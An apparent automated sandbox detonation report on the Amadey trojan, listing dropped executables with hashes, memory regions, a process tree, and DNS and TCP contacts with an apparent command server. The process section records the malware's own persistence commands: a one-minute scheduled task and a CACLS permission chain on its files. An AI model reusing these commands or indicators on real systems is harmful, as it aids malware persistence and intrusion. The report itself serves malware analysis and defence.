memory/2044-126-0x0000000000400000-0x000000000045A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/1272-137-0x0000000000130000-0x0000000000BD1000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/1272-143-0x0000000004650000-0x000000000549A000-memory.dmp

memory/1892-144-0x0000000077A40000-0x0000000077BE9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/1892-155-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-154-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-157-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-158-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-159-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-160-0x000000013F610000-0x000000014045A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/1272-165-0x00000000044F0000-0x0000000004E33000-memory.dmp

memory/3024-166-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1892-164-0x000000013F610000-0x000000014045A000-memory.dmp

\Users\Admin\AppData\Local\Temp\1000127001\taskmask.exe

MD5 f8f7c8c4cc25ba49c5b591aab8bfdc04
SHA1 6ed43db5ba58257c1283abfa8a08290ccf896033
SHA256 67cd8472366ecda8a195fc8a44e4747429f8d2e6d8c16d0c15a0e5a500506feb
SHA512 6e7fbd61fdf4cdcfed8f78a4d2272bb204bbd579cec94c4a45569bef9c5c62be22117545030a91291cae0cee6dea7454ab57fa16907d26d9a39cd7275bdbb9b5

memory/2044-168-0x0000000073940000-0x000000007402E000-memory.dmp

memory/3024-169-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/3024-170-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-171-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-172-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-173-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-174-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-175-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-176-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-177-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-178-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1272-179-0x0000000004650000-0x000000000549A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000129001\taskhostclp.exe

MD5 3258deefff3ca70f3dfa3e67067ca611
SHA1 a28ec103c22b03f381dd72073cf620b11881b7b7
SHA256 11c3e7a62b3e78c6ec720aea618bf0a3854ad42535f888532c3e206f3724db4c
SHA512 541eec13adbb3afcc6ee0cfea2d1ddd71036a0da9be5fe6919a2becca5dc23089754d2e5bfd15886cd8e3981f982e40d28bb467132cfdf04844d930ca612b3b8

memory/3024-181-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1892-182-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/1892-183-0x000000013F610000-0x000000014045A000-memory.dmp

memory/2044-185-0x0000000007490000-0x00000000074D0000-memory.dmp

memory/3024-186-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3024-187-0x0000000000030000-0x0000000000973000-memory.dmp

memory/2044-188-0x0000000073940000-0x000000007402E000-memory.dmp

memory/3024-189-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/3024-190-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1892-195-0x000000013F610000-0x000000014045A000-memory.dmp

memory/3040-196-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

memory/3040-197-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/2044-199-0x0000000007490000-0x00000000074D0000-memory.dmp

memory/3040-198-0x0000000002870000-0x00000000028F0000-memory.dmp

memory/3024-200-0x0000000000030000-0x0000000000973000-memory.dmp

memory/3040-201-0x000000001B2B0000-0x000000001B592000-memory.dmp

memory/3040-202-0x0000000002430000-0x0000000002438000-memory.dmp

memory/3040-204-0x0000000002870000-0x00000000028F0000-memory.dmp

\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 c3944a1e56f3c41bd7957fe045472ce8
SHA1 ad17123ad2b3f4d9a516c93b88d42930c047bb85
SHA256 e27f51358d373b0b6cdf3e32f38bf3c836113fdbde4756ea26d0a4d1f4e101fb
SHA512 323bb4670d7dc3ef3b354cc724f9538dd683f221310ee96c78f01fc4680bade3c7628711af5ba0ff03c1584fc7cb5363f10faef9c8578e0bb632dc8d1657d057

C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe

MD5 3de8733baaf72b71b2dc206361d57d49
SHA1 e56011ae28e2bc957f1b96537b478f221f68b06d
SHA256 8be2829f835bc11d2c6e9953cfaa7c4c216e307a34a3c7e64bb8a785748e18f6
SHA512 355d9b748a7720aa8ca5b73d116af9849f395786ca71af2d44d183da1df51022ad02aaa49f1f2cdd5cc2bff664fcc8d33a3258ad91afd8f4d6ef2b56f5827196

memory/1688-209-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/3024-208-0x0000000000030000-0x0000000000973000-memory.dmp

memory/1688-210-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/3024-211-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/3040-213-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

memory/1688-212-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-214-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-215-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-216-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-217-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-218-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-219-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-220-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1688-221-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/1892-222-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1688-223-0x0000000000E20000-0x0000000001763000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/2512-225-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/1688-226-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/2512-232-0x0000000077C40000-0x0000000077C41000-memory.dmp

memory/1688-233-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/2512-234-0x0000000000100000-0x0000000000101000-memory.dmp

memory/2512-236-0x0000000000130000-0x0000000000BD1000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VD1AX5WJEHO2R5CIPBWT.temp

MD5 96aacfb1cbe0eb8dfff965c5d20ffbd6
SHA1 8c78cb2281006312b51327a4355f3348993caf52
SHA256 98c921d4d4f9cad2da010a2da17b2488cb244ba06f0d04f2181256f1afee3e19
SHA512 d8794e98f7d67ac27adc09cef3bad97a9afd3143269ff6a96718d4e9ef7130a97fae23abb7f4bc26a13a6ecd8d98a32cc817e016e6ac589a68de4d1644a5185e

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 96aacfb1cbe0eb8dfff965c5d20ffbd6
SHA1 8c78cb2281006312b51327a4355f3348993caf52
SHA256 98c921d4d4f9cad2da010a2da17b2488cb244ba06f0d04f2181256f1afee3e19
SHA512 d8794e98f7d67ac27adc09cef3bad97a9afd3143269ff6a96718d4e9ef7130a97fae23abb7f4bc26a13a6ecd8d98a32cc817e016e6ac589a68de4d1644a5185e

memory/2380-244-0x000000001B240000-0x000000001B522000-memory.dmp

memory/1688-237-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/2380-246-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

memory/2380-247-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/2380-245-0x0000000001E30000-0x0000000001E38000-memory.dmp

memory/2380-249-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/2380-250-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/2380-248-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

memory/1688-252-0x0000000000E20000-0x0000000001763000-memory.dmp

memory/2380-253-0x00000000027D0000-0x0000000002850000-memory.dmp

memory/2512-254-0x0000000000130000-0x0000000000BD1000-memory.dmp

memory/2380-255-0x000007FEF54B0000-0x000007FEF5E4D000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\1000128101\rdpcllp.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/1892-259-0x000000013F610000-0x000000014045A000-memory.dmp

memory/1892-260-0x0000000077A40000-0x0000000077BE9000-memory.dmp

\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2792-263-0x000000013F740000-0x000000014058A000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

memory/2952-266-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/2952-275-0x000000013F740000-0x000000014058A000-memory.dmp

memory/2952-276-0x0000000077A40000-0x0000000077BE9000-memory.dmp

memory/2720-279-0x0000000019BB0000-0x0000000019E92000-memory.dmp

memory/2720-281-0x0000000000AA0000-0x0000000000AA8000-memory.dmp

memory/2720-280-0x000007FEF5E50000-0x000007FEF67ED000-memory.dmp

C:\Windows\System32\drivers\etc\hosts

MD5 3e9af076957c5b2f9c9ce5ec994bea05
SHA1 a8c7326f6bceffaeed1c2bb8d7165e56497965fe
SHA256 e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e
SHA512 933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

C:\Program Files\Google\Chrome\updater.exe

MD5 768200a76def472e675539094047bed9
SHA1 24bc17689541656a8a12902c7f19bd991193ca50
SHA256 79ff7ea339f95a557cec5e39d944118af6c105c29736e448d5aad60368eae5af
SHA512 143cfc563ebd3f57192adc4484ba0b4b246c4b63d3f10b0e90e83ea841ea83488636233eb58a8217fd1a9dd825075f28e0b1f858bc9e4a5fd5abb6e0712fabbb

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

Analysis: behavioral2

Detonation Overview

Submitted

2023-08-01 23:46

Reported

2023-08-01 23:48

Platform

win10v2004-20230703-en

Max time kernel

147s

Max time network

143s

Command Line

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"

Signatures

Amadey

trojan amadey

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1372 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1372 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 1372 wrote to memory of 2756 N/A C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe
PID 2756 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2756 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2756 wrote to memory of 1164 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\schtasks.exe
PID 2756 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 2756 wrote to memory of 3468 N/A C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 884 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4836 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 4644 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 3468 wrote to memory of 1380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 1380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 1380 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe
PID 3468 wrote to memory of 8 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cacls.exe

Processes

C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe

"C:\Users\Admin\AppData\Local\Temp\9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df6.exe"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

"C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "Admin:N"&&CACLS "oneetx.exe" /P "Admin:R" /E&&echo Y|CACLS "..\eb0f58bce7" /P "Admin:N"&&CACLS "..\eb0f58bce7" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "oneetx.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\eb0f58bce7" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 158.240.127.40.in-addr.arpa udp
NL 45.15.156.208:80 45.15.156.208 tcp
NL 45.15.156.208:80 45.15.156.208 tcp
US 8.8.8.8:53 second.amadgood.com udp
US 8.8.8.8:53 208.156.15.45.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 89.65.42.20.in-addr.arpa udp

Files

memory/1372-133-0x0000000000740000-0x00000000011E1000-memory.dmp

memory/1372-134-0x00000000031F0000-0x00000000031F1000-memory.dmp

memory/1372-135-0x0000000000740000-0x00000000011E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/1372-151-0x0000000000740000-0x00000000011E1000-memory.dmp

memory/2756-153-0x00000000010E0000-0x00000000010E1000-memory.dmp

memory/2756-152-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/2756-154-0x00000000000D0000-0x0000000000B71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\498570331231

MD5 2841eaa48ad70635c173051bc9169e9e
SHA1 13d1c16636def5fdcb586d0e2de10bc20c8b44fc
SHA256 e81f0dc876fec6f0a99575dfa8f9d411fbe3b2ee6431a7bed218658b1daef179
SHA512 73f1d7914d1d9823ded79b99a32fe4af1f2dc4603314303ebc2397a723b52757b646175d031bd7c25317954e1a42b1b20518906bbec4ce10a9dbf6f486583840

memory/2756-169-0x00000000000D0000-0x0000000000B71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/1848-172-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/1848-171-0x00000000011E0000-0x00000000011E1000-memory.dmp

memory/1848-174-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/1848-177-0x00000000000D0000-0x0000000000B71000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\eb0f58bce7\oneetx.exe

MD5 89e9bc7a5d97370a0f4a35041a54a696
SHA1 c0e8572f48b2e5f83c39374f4175e35a5e7c2029
SHA256 9b6b6c5cf8dbafd06176a1f8e5a7cf7fc78a5ffb86df627e6de4eb455506b847
SHA512 12100def3ac697a0fce815a3be2e41bb62f47f8a60b273c3cf367096c231c86110903322d8f351d8609f7f5f72f5aaf45d6539e09972c54221697820ece570f2

memory/2608-179-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/2608-180-0x0000000000FD0000-0x0000000000FD1000-memory.dmp

memory/2608-181-0x00000000000D0000-0x0000000000B71000-memory.dmp

memory/2608-184-0x00000000000D0000-0x0000000000B71000-memory.dmp